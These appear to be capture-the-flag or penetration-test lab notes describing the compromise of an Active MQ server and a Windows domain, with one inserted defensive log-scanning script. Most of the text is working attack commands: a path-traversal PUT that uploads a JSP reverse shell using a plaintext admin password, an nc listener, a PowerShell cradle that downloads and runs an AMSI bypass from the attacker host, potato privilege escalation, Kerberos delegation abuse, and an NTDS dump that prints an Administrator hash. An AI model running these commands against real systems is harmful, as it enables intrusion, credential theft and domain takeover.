## Active MQ exploit 2016

Flag 3 is obtained here.
Active MQ is a service running on port 8161.

### Uploading the shell

Upload the JSP reverse shell through the fileserver PUT handler:

```bash
curl -u 'admin:3f18DV^t!svBV4ntcrLRTWi2XaMCDK' -v -X PUT --data "@jsp-reverse.jsp" http://10.9.20.12:8161/fileserver/..\\admin\\jsp-reverse.jsp
```

Visiting the page triggers the shell; catch it with the listener:

```
http://10.9.20.12:8161/admin/jsp-reverse.jsp
```

```bash
nc -lvnp 8080
```

### Stable shell

```
cd C:\Windows\System32\WindowsPowerShell\v1.0\
powershell.exe
```

Serve am.txt (AMSI bypass), the shell runner and SliverPhollow.txt from the attacking host:

```bash
python -m http.server 80
```

Then on the target:

```powershell
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/am.txt') | IEX
```
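Added example, not part of the original notes: a defender-side check that scans web-server access log lines (the sample lines below are constructed) for the PUT-to-fileserver traversal pattern used in this step, so the upload can be spotted in logs.

```python
"""Flag Active MQ fileserver uploads that traverse out of /fileserver/ (defender check).

Added example for these notes; the log lines are constructed in the NCSA
format that Jetty's request log produces, not captured from the lab.
"""
import re
from urllib.parse import unquote

# Common/NCSA access-log line: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(path: str) -> str:
    """URL-decode twice (catches %2e%2e / %5c and double-encoded forms) and
    fold backslashes to slashes so '..\\admin' and '../admin' look the same."""
    return unquote(unquote(path)).replace("\\", "/")


def is_suspicious(line: str) -> bool:
    """True for a PUT under /fileserver/ whose path escapes that directory
    (contains '/../' after normalization) or drops a .jsp anywhere."""
    m = LOG_RE.match(line)
    if not m or m.group("method") != "PUT":
        return False
    path = normalize(m.group("path"))
    if not path.startswith("/fileserver/"):
        return False
    return "/../" in path or path.lower().endswith(".jsp")


def scan(lines):
    """Return only the log lines that match the upload pattern."""
    return [ln for ln in lines if is_suspicious(ln)]


# Constructed sample: one traversal PUT, the follow-up GET, and benign traffic.
SAMPLE_LOG = [
    '10.10.15.207 - admin [12/Mar/2023:10:14:02 +0000] "PUT /fileserver/..%5Cadmin%5Cjsp-reverse.jsp HTTP/1.1" 204 0',
    '10.10.15.207 - - [12/Mar/2023:10:14:30 +0000] "GET /admin/jsp-reverse.jsp HTTP/1.1" 200 512',
    '10.9.20.50 - - [12/Mar/2023:10:15:00 +0000] "GET /admin/queues.jsp HTTP/1.1" 200 8192',
    '10.9.20.50 - admin [12/Mar/2023:10:16:00 +0000] "PUT /fileserver/report.txt HTTP/1.1" 204 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT:", hit)
```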

### Privilege Escalation

In the Sliver session:

```
upload SharpEfsPotato.exe
upload CASUAL_PLATFORM.exe
execute SharpEfsPotato.exe -p CASUAL_PLATFORM.exe
```

Then, in the new shell, load the AMSI bypass again:

```powershell
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/am.txt') | IEX
```

### Lateral Movement to M3DC

Sliver with Kali.

Obtain the TGT of the SPN account we have access to (the user with the SPN also has GenericWrite over the other machine):

```powershell
rubeus tgtdeleg /service:krbtgt /nowrap
[IO.File]::WriteAllBytes("C:\Windows\tasks\svc_apache.kirbi", [Convert]::FromBase64String(""))
```

On Kali:

```bash
ticketConverter.py svc_apache.kirbi svc_apache.ccache
export KRB5CCNAME=svc_apache.ccache
rbcd.py -delegate-from svc_apache -delegate-to 'M3DC$' -action 'write' 'm3c.local/svc_apache' -k -no-pass
getST.py -spn 'cifs/M3DC.m3c.local' -impersonate 'Norma.branham' 'm3c.local/svc_apache' -k -no-pass
export KRB5CCNAME=Norma.branham.ccache
cme smb 10.9.20.10 -u norma.branham --use-kcache --ntds
```

### Loot

```
SMB 10.9.20.10 445 M3DC [+] m3c.local\norma.branham from ccache (Pwn3d!)
SMB 10.9.20.10 445 M3DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.9.20.10 445 M3DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:5a0618a9e03bd9fa9efbe142468afed5:::
```